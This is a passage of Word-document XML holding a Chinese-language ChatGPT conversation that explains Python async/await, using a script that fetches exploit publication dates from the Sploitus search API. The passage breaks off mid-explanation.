        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    async with httpx.AsyncClient(proxies=proxies, http2=True, verify=False) as client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F43310" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        response = await client.post(url=url, json={"type": "exploits", "sort": "date", "query": "cve", "title": False, "offset": data_offset}, headers=headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2057C9A7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        res_json = response.json()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DFC12A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        res_list = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D025C9F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        exps = res_json["exploits"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA81CFA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        for single_exp in exps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326C54CC" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            if single_exp.get("published")!=None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FDF5DF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                single_exp_date = single_exp.get("published")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CE24BC" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                res_list.append(single_exp_date)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64640707" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        print(res_list)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6E8EDD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="686BAB6B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>task_list = [ querySploitus(url=url, data_offset=10*x) for x in range(0,10) ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059C20E2" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51A63EFD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CB5549" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    await asyncio.gather(*task_list)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2093C882" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="607FE7C9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>asyncio.run(main())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EBEB94" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66B95345" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个修复后的代码中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">main </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个异步函数，它调用并等待</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.gather(*task_list) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的结果。然后，我们使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.run(main()) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> main </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBC7B58" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD4D3C8" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个字使用本身的意义是什么？他会临时挂起自己执行的异步函数，先去执行后面的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>代码，等异步函数执行完再回来吗？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>async await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的语句结构使用的场景是把大量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句放在一个时间段执行来优化效率的吗</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CD8064" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C342EA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DEAC288" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键字用于等待一个异步操作的完成。当你在一个协程中使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键字，这意味着你要暂停协程的执行，等待一个异步操作的完成。这个异步操作可能是另一个协程，或者是一个返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Future</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的异步</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2235A5BD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F23FE53" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句时，它不会立即执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后面的代码，而是将控制权交回给事件循环。事件循环可以继续执行其他协程，直到被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的异步操作完成。一旦这个异步操作完成，事件循环将重新唤醒被暂停的协程，继续执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后面的代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E0BEF9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="230B2403" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键字主要用于异步</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编程。在现代应用程序中，很多操作都是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密集型的，如网络请求、文件读写、数据库查询等。这些操作在等待</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完成时会阻塞线程，使得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法进行其他任务。而使用异步</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编程，可以让</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在等待</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作时执行其他任务，从而提高程序的效率和响应性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D713A7D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BDDBE79" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如，假设你有一个网络服务器，需要处理大量的并发请求。如果你使用同步编程，那么对于每个请求，你都需要等待网络</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完成（如接收请求、发送响应）才能处理下一个请求。这样的效率很低，因为在等待网络</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>什么也不做。但如果你使用异步</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编程，你可以在等待一个请求的网络</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时处理其他请求。当一个请求的网络</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完成，你可以立即切换回去处理这个请求。这样，你的服务器可以高效地处理大量并发请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E12BE9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5E382D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和我说说第一段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329DE878" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>task_list = [ querySploitus(url=url, data_offset=10*x) for x in range(0,10) ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEC206D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>loop = asyncio.get_event_loop()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A4F7D2" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>loop.run_until_complete(asyncio.wait(task_list))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC427CE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7237CEB1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="620159BB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DC3778" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6348DCF2" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    task1 = asyncio.create_task(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D510E65" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        say_after(1, 'hello'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A23AC5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FB557A1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    task2 = asyncio.create_task(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEFA0F0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        say_after(2, 'world'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FE1524" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F7DECF5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print(f"started at {time.strftime('%X')}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF8358A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="092AD45D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # Wait until both tasks are completed (should take around 2 seconds.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B21B68C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个任务同时执行，直到到所有任务执行完成。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6764ECA1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    await task1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D6B92D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    await task2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398AC146" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B2570AD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    print(f"finished at {time.strftime('%X')}")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的区别</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066052F3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385AED4C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="134E5F38" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这两段代码都是在做并发执行的任务，但是它们使用的方法略有不同。我将逐一解释。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A79C51" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7924B95F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在第一段代码中：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E86B93" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F7395D5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5047E565" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>task_list = [ querySploitus(url=url, data_offset=10*x) for x in range(0,10) ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7138256F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>loop = asyncio.get_event_loop()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12011A0C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>loop.run_until_complete(asyncio.wait(task_list))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F51089D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72C44919" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">querySploitus(url=url, data_offset=10*x) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
